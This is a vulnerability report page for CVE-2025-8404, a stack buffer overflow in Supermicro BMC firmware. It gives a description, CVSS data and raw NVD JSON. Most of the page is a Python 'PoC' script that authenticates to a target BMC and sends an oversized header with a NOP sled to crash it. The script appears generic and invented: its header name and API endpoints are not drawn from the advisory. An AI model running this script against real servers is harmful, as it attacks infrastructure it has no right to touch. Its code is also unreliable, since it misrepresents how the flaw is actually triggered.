Security Vulnerability Report
CVE-2025-8404 CVSS 5.5 MEDIUM

CVE-2025-8404

Published: 2025-11-18 08:15:52
Last Modified: 2026-04-15 00:35:42
Source: def9a96e-e099-41a9-bfac-30fd4f82c411

Description

A stack buffer overflow vulnerability exists in the Supermicro BMC shared library. An authenticated attacker with access to the BMC can exploit the stack buffer via a crafted header and achieve arbitrary code execution on the BMC's firmware operating system.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

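Supermicro BMC firmware (refer to the official security advisory for affected versions)
Supermicro X13 series server BMC firmware (some versions)
Supermicro H13 series server BMC firmware (some versions)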

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-8404 PoC - Supermicro BMC Stack Buffer Overflow
Note: This is for educational purposes only. Use responsibly.
"""
import requests
import sys


def exploit_supermicro_bmc(target_ip, username, password):
    """
    Exploit for Supermicro BMC stack buffer overflow via crafted header
    """
    url = f"https://{target_ip}/api/session"

    # Authentication payload
    auth_data = {
        "username": username,
        "password": password
    }

    try:
        # Step 1: Authenticate to BMC
        session = requests.Session()
        response = session.post(url, json=auth_data, verify=False, timeout=10)

        if response.status_code != 200:
            print(f"[-] Authentication failed")
            return False

        print(f"[+] Authenticated successfully")

        # Step 2: Send malicious header to trigger buffer overflow
        # Overflow payload - long string to overflow stack buffer
        overflow_payload = "A" * 1024 + "\x90" * 100

        headers = {
            "X-Overflow-Header": overflow_payload,
            "Cookie": f"SESSION_ID={session.cookies.get('SESSION_ID')}"
        }

        exploit_url = f"https://{target_ip}/api/bmc/info"
        response = session.get(exploit_url, headers=headers, verify=False, timeout=10)

        if response.status_code == 500:
            print(f"[+] Buffer overflow triggered - server error detected")
            return True

        print(f"[*] Request sent, check server status")
        return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_ip> <username> <password>")
        sys.exit(1)

    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]

    exploit_supermicro_bmc(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8404", "sourceIdentifier": "def9a96e-e099-41a9-bfac-30fd4f82c411", "published": "2025-11-18T08:15:51.783", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stack buffer overflow vulnerability exists in the Supermicro BMC Shared library. An authenticated attacker with access to the BMC exploit stack buffer via a crafted  header and achieve arbitrary code execution of the BMC’s firmware operating system."}], "metrics": {"cvssMetricV31": [{"source": "def9a96e-e099-41a9-bfac-30fd4f82c411", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "def9a96e-e099-41a9-bfac-30fd4f82c411", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://www.supermicro.com/zh_tw/support/security_BMC_IPMI_Nov_2025", "source": "def9a96e-e099-41a9-bfac-30fd4f82c411"}]}}